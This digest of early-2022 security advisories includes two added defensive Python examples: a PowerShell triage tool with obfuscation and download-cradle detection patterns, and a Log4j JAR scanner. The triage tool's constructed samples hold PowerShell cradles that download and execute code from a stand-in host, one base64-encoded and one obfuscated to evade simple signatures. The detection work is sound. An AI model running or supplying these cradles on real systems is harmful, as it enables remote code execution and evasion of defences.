- Citrix Releases Security Updates for Hypervisor
- Apple Releases Security Updates for iOS and iPadOS
- CNMF Identifies and Discloses Malware used by Iranian APT MuddyWater
- Cisco Releases Security Updates for Multiple Products
- New Palo Alto Networks Security Advisories
- Microsoft Releases January 2022 Security Updates
- Adobe Releases Security Updates for Multiple Products
- Citrix Releases Security Update for Workspace App for Linux
- Samba Releases Security Update
- CISA, FBI, and NSA Release Cybersecurity Advisory on Russian Cyber Threats to U.S. Critical Infrastructure
- Juniper Networks Releases Security Updates for Multiple Products
- Ivanti Has Released Security Updates for Multiple Products
_______________________________
Citrix Releases Security Updates for Hypervisor
Situation
Citrix has released security updates to address several vulnerabilities in Citrix Hypervisor.
Problem
Several security issues have been identified in Citrix Hypervisor that may allow privileged code in a guest VM to cause the host to crash or become unresponsive.
Implication
An attacker running privileged code in a guest VM could exploit these issues to crash the host or make it unresponsive, causing a denial of service for every VM on that host.
Need
Citrix has released hotfixes to address these issues. Citrix recommends that affected customers install these hotfixes:
Citrix Hypervisor 8.2 CU1 LTSR: CTX338448 – https://support.citrix.com/article/CTX338448 and CTX335882 – https://support.citrix.com/article/CTX335882
Citrix Hypervisor 8.2: CTX338444 – https://support.citrix.com/article/CTX338444 and CTX335880 – https://support.citrix.com/article/CTX335880
Citrix XenServer 7.1 LTSR CU2: CTX335531 – https://support.citrix.com/article/CTX335531 and CTX335881 – https://support.citrix.com/article/CTX335881
For a more technical overview:
https://support.citrix.com/article/CTX335432
________________________________
Apple Releases Security Updates for iOS and iPadOS
Situation
Apple has released iOS 15.2.1 and iPadOS 15.2.1 to address a vulnerability in earlier versions of iOS and iPadOS.
Problem
For their customers’ protection, Apple doesn’t disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.
Implication
An attacker could exploit this vulnerability to cause a denial-of-service condition.
Need
CISA encourages users and administrators to review the Apple security page for iOS 15.2.1 and iPadOS 15.2.1 and apply the necessary updates.
For a more technical overview:
https://support.apple.com/en-us/HT213043
________________________________
CNMF Identifies and Discloses Malware used by Iranian APT MuddyWater
Situation
U.S. Cyber Command’s Cyber National Mission Force (CNMF) has identified multiple open-source tools used by an Iranian advanced persistent threat (APT) group known as MuddyWater.
Problem
According to CNMF, “MuddyWater has been seen using a variety of techniques to maintain access to victim networks. These include side-loading DLLs to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.”
Implication
Any one of these tools is open source and may appear in legitimate use; if a network operator finds several of them on the same network, it may indicate the presence of Iranian malicious cyber actors.
Need
CISA encourages users and administrators to review U.S. Cyber Command's press release, "Iranian intel cyber suite of malware uses open source tools", as well as CNMF's VirusTotal page for more information.
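The press release names two techniques worth hunting for: DLL side-loading and obfuscated PowerShell that hides command-and-control functions. The block below is an added example, not code from CNMF or CISA and not tied to any specific MuddyWater sample: it decodes PowerShell -EncodedCommand payloads from process-creation command lines and flags common obfuscation and download-cradle patterns. The command lines it runs over are constructed for illustration, and the indicator names, regexes and alert threshold are this example's own choices, so tune them against your environment's baseline before relying on them. DLL side-loading is not covered here; that needs module-load telemetry rather than command lines.

```python
"""Triage PowerShell command lines for encoded payloads and obfuscation.

Added example; the sample command lines below are constructed, not observed.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Heuristic indicators, in evaluation order. The regexes are illustrative
# choices for this example, not a vendor or CNMF signature set.
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}")),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("no_profile", re.compile(r"(?i)-no(?:p|profile)\b")),
    ("policy_bypass", re.compile(r"(?i)-e(?:p|x|xec|xecutionpolicy)\s+bypass")),
    ("invoke_expression", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("download_cradle", re.compile(
        r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|start-bitstransfer")),
    ("base64_decode", re.compile(r"(?i)frombase64string")),
    ("backtick_in_token", re.compile(r"[A-Za-z]`[A-Za-z]")),   # I`E`X style keyword splitting
    ("format_operator", re.compile(r"(?i)\{\d+\}[^\n]*-f\s")),  # '{1}{0}' -f 'b','a' reordering
    ("char_arithmetic", re.compile(r"(?i)\[char\]\s*\(?\d")),   # [char]73+[char]69... building strings
    ("string_concat_chain", re.compile(r"(?:'[^']*'\s*\+\s*){3,}")),
    ("xor", re.compile(r"(?i)-bxor")),
]

# -e, -ec, -en, -enc, -encodedcommand: PowerShell accepts any unambiguous prefix.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")


def encode_powershell(script: str) -> str:
    """Produce the -EncodedCommand form (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


@dataclass
class Verdict:
    cmdline: str
    decoded: Optional[str]
    indicators: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)


def analyze(cmdline: str) -> Verdict:
    """Run every indicator over the command line plus its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS if rx.search(haystack)]
    return Verdict(cmdline, decoded, hits)


CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"

# Constructed sample process-creation command lines: a benign admin task, an
# encoded download cradle, and a plain-text cradle obfuscated three ways.
SAMPLES = [
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "powershell.exe -nop -w hidden -enc " + encode_powershell(CRADLE_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -c \""
    "$u='http://exa'+'mple.inv'+'alid/'+'p'; "
    "I`E`X ((New-Object ('{1}{0}' -f 'Client','Net.Web')).DownloadString($u))\"",
]


def triage(cmdlines, threshold: int = 3) -> List[Verdict]:
    """Return verdicts at or above the alert threshold, highest score first."""
    verdicts = [analyze(c) for c in cmdlines]
    return sorted((v for v in verdicts if v.score >= threshold), key=lambda v: -v.score)


if __name__ == "__main__":
    for v in triage(SAMPLES):
        print(f"score={v.score} indicators={v.indicators}")
        if v.decoded:
            print("  decoded:", v.decoded)
```

The benign sample scores one indicator (-NoProfile is routine in scheduled tasks), which is why the threshold matters more than any single regex. Note that the backtick-split `I`E`X` in the third sample deliberately evades the plain `iex` pattern; the concatenation, format-operator and backtick indicators are what catch it, so keep those even if they look noisy at first.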
________________________________
Cisco Releases Security Updates for Multiple Products
Situation
Cisco has released security updates to address a vulnerability affecting Cisco Unified Contact Center Management Portal (Unified CCMP) and Cisco Unified Contact Center Domain Manager (Unified CCDM).
Problem
A vulnerability in the web-based management interface of Cisco Unified Contact Center Management Portal (Unified CCMP) and Cisco Unified Contact Center Domain Manager (Unified CCDM) could allow an authenticated, remote attacker to elevate their privileges to Administrator.
Implication
A remote attacker could exploit this vulnerability to take control of an affected system.
Need
CISA encourages users and administrators to review Cisco Security Advisory cisco-sa-ccmp-priv-esc-JzhTFLm4 and apply the necessary updates.
________________________________
New Palo Alto Networks Security Advisories
Situation
Palo Alto Networks published four new security advisories at https://security.paloaltonetworks.com on January 12, 2022.
Problem
All four concern the Cortex XDR Agent: an uncontrolled search path element leading to local privilege escalation, unintended program execution when using a Live Terminal session, a local arbitrary file deletion vulnerability, and a file information exposure vulnerability when generating a support file.
Implication
Successful exploitation could allow local privilege escalation, execution of unintended programs, deletion of arbitrary files, or disclosure of file contents through a generated support file.
Need
Review the advisories at https://security.paloaltonetworks.com and apply the fixed Cortex XDR Agent versions or workarounds they specify.
For a brief overview:
https://security.paloaltonetworks.com/
________________________________
Microsoft Releases January 2022 Security Updates
Situation
Microsoft has released updates to address multiple vulnerabilities in Microsoft software.
Implication
An attacker could exploit some of these vulnerabilities to take control of an affected system.
Need
CISA encourages users and administrators to review Microsoft’s January 2022 Security Update Summary and Deployment Information and apply the necessary updates.
For a more technical overview:
https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan
________________________________
Adobe Releases Security Updates for Multiple Products
Situation
Adobe has released security updates for multiple products including Acrobat, Reader, Illustrator, Bridge, InCopy, and InDesign for both Windows and macOS.
Problem
The patched vulnerabilities include use-after-free and out-of-bounds read and write bugs, among others, with impacts that include arbitrary code execution and privilege escalation.
Implication
An attacker who successfully exploits some of these vulnerabilities could take control of an affected device.
Need
Adobe recommends applying the latest updates for Acrobat and Reader, Illustrator, Bridge, InCopy, and InDesign to protect against these vulnerabilities. For additional information and patch notes please visit the links below.
For a brief overview:
Adobe Security Bulletins:
https://helpx.adobe.com/security.html/security/security-bulletin.ug.html
________________________________
Citrix Releases Security Update for Workspace App for Linux
Situation
Citrix has released a security update to address a vulnerability in Workspace App for Linux.
Problem
A vulnerability in Citrix Workspace app for Linux could result in a local user elevating their privilege level to root. This vulnerability affects Citrix Workspace app for Linux 2012-2111 and only exists if App Protection was installed as part of Citrix Workspace app for Linux.
Implication
A local attacker could exploit this vulnerability to gain root on an affected system.
Need
Update to Citrix Workspace app for Linux 2112 or later.
For a more technical overview:
https://support.citrix.com/article/CTX338435
________________________________
Samba Releases Security Update
Situation
The Samba Team has released a security update to address a vulnerability in multiple versions of Samba. All versions of the Samba file server prior to 4.13.16 are affected.
Problem
A malicious client can use a symlink race to create a directory in a part of the server file system that is not exported under the share definition. The connecting user must already have permission to create directories in the target location.
Implication
A malicious client could create directories outside the boundary of the exported share, in any location where the connecting user already has permission to do so.
Need
Update Samba to 4.13.16 or later.
For a more technical overview:
https://www.samba.org/samba/security/CVE-2021-43566.html
________________________________
CISA, FBI, and NSA Release Cybersecurity Advisory on Russian Cyber Threats to U.S. Critical Infrastructure
Situation
CISA, FBI, and NSA have released a joint advisory on Russian state-sponsored cyber operations that includes tactics, techniques, and procedures.
Problem
Russian state-sponsored actors use a variety of tactics to steal intellectual property, influence political activity, and more.
Implication
These actors have demonstrated the capability to damage critical infrastructure in the US and other countries.
Need
Review the advisory's indicators of compromise and the tactics, techniques, and procedures it describes.
For a brief overview:
https://www.cisa.gov/uscert/russia
________________________________
Juniper Networks Releases Security Updates for Multiple Products
Situation
Juniper Networks has released security updates to address vulnerabilities affecting multiple products.
Problem
Updates are available for multiple Juniper products. Review the Juniper security advisories page linked below for the products in your environment.
Implication
An attacker could exploit some of these vulnerabilities to take control of an affected system.
Need
CISA encourages users and administrators to review the Juniper Networks security advisories page and apply the necessary updates.
For a more technical overview:
https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES
________________________________
Ivanti Has Released Security Updates for Multiple Products
Situation
Ivanti has updated its Log4j security advisory and released new security updates.
Problem
Ivanti has issued new advisories and patches for Avalanche; File Director; and MobileIron Core, MobileIron Sentry (Core/Cloud), and MobileIron Core Connector, addressing each product's exposure to the Log4j vulnerability (CVE-2021-44228).
Implication
An unauthenticated attacker who successfully exploits this vulnerability could take control of the affected system.
Need
CISA encourages users and administrators to review the Ivanti security advisories for Avalanche; File Director; and MobileIron Core, MobileIron Sentry (Core/Cloud), and MobileIron Core Connector and apply the necessary updates and workarounds.
For a brief overview:
Ivanti Log4j Security Advisory:
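Vendor advisories like Ivanti's tell you which products ship a vulnerable Log4j, but the same library turns up in self-hosted software the vendor list does not cover. The block below is an added example, not Ivanti's or CISA's tooling: it walks a directory tree, opens every JAR/WAR/EAR (including archives nested inside other archives, which is where log4j-core usually hides), and reports each one that bundles the JndiLookup class exploited by CVE-2021-44228, together with the version recorded in the library's Maven pom.properties. The sample archives it scans are constructed in a temporary directory with placeholder bytes in place of real bytecode; the fix thresholds (2.15.0, with the 2.12.2 and 2.3.1 backports) are the ones Apache published for CVE-2021-44228.

```python
"""Find bundled log4j-core JARs carrying JndiLookup.class (CVE-2021-44228).

Added example; the archives in demo() are constructed stand-ins.
"""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J_CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 5


@dataclass
class Finding:
    location: str           # path on disk, "!" separates nested archive entries
    version: Optional[str]  # from pom.properties, None if the file is absent
    vulnerable: bool        # below the CVE-2021-44228 fix for its release line


def parse_version(v: str) -> Tuple[int, ...]:
    # Assumption: numeric dotted versions such as 2.14.1; pre-release tags are ignored.
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])


def vulnerable_to_cve_2021_44228(version: Optional[str]) -> bool:
    """CVE-2021-44228 was fixed in 2.15.0, with backports 2.12.2 (Java 7) and
    2.3.1 (Java 6). An unknown version with JndiLookup present is treated as
    suspect so that it gets a manual look rather than silently passing."""
    if version is None:
        return True
    v = parse_version(version)
    if v[:2] == (2, 3):
        return v < (2, 3, 1)
    if v[:2] == (2, 12):
        return v < (2, 12, 2)
    return v < (2, 15, 0)


def scan_archive(data: bytes, location: str, findings: List[Finding], depth: int = 0) -> None:
    """Look for JndiLookup.class in a zip-format archive and recurse into any
    archives nested inside it (fat JARs, WARs, EARs), up to MAX_NESTING."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if JNDI_LOOKUP_CLASS in names:
            version = None
            if LOG4J_CORE_POM in names:
                props = zf.read(LOG4J_CORE_POM).decode("utf-8", "replace")
                m = re.search(r"^version=(.+)$", props, re.M)
                version = m.group(1).strip() if m else None
            findings.append(Finding(location, version, vulnerable_to_cve_2021_44228(version)))
        if depth < MAX_NESTING:
            for name in names:
                if name.lower().endswith(ARCHIVE_EXTS):
                    scan_archive(zf.read(name), f"{location}!{name}", findings, depth + 1)


def scan_tree(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, findings)
    return sorted(findings, key=lambda f: f.location)


def _fake_log4j_core(version: str) -> bytes:
    """Constructed stand-in for log4j-core: only the two entries the scanner
    keys on, with placeholder bytes instead of real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe placeholder")
        zf.writestr(LOG4J_CORE_POM, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
    return buf.getvalue()


def demo() -> List[Finding]:
    """Build a constructed sample tree in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.14.1"))
    with open(os.path.join(root, "lib", "unrelated.jar"), "wb") as fh:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("com/example/Util.class", b"placeholder")
        fh.write(buf.getvalue())
    # A WAR bundling a patched log4j-core one level down.
    with open(os.path.join(root, "service.war"), "wb") as fh:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", _fake_log4j_core("2.17.1"))
        fh.write(buf.getvalue())
    return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        tag = "VULNERABLE" if f.vulnerable else "present   "
        print(f"{tag} {f.version or '?':8} {f.location}")
```

Two caveats when reading the output. First, JndiLookup.class is still shipped in versions at or above 2.15.0, so "present" is not "vulnerable"; the version decides, and because later Log4j CVEs raised the recommended floor to 2.17.1 on Java 8, treat anything between 2.15.0 and 2.17.0 as needing an update even though this check passes it for CVE-2021-44228 specifically. Second, Apache's documented mitigation was to delete JndiLookup.class from the JAR, so a log4j-core whose pom.properties shows a vulnerable version but which produces no finding here is consistent with that mitigation having been applied; confirm it rather than assuming.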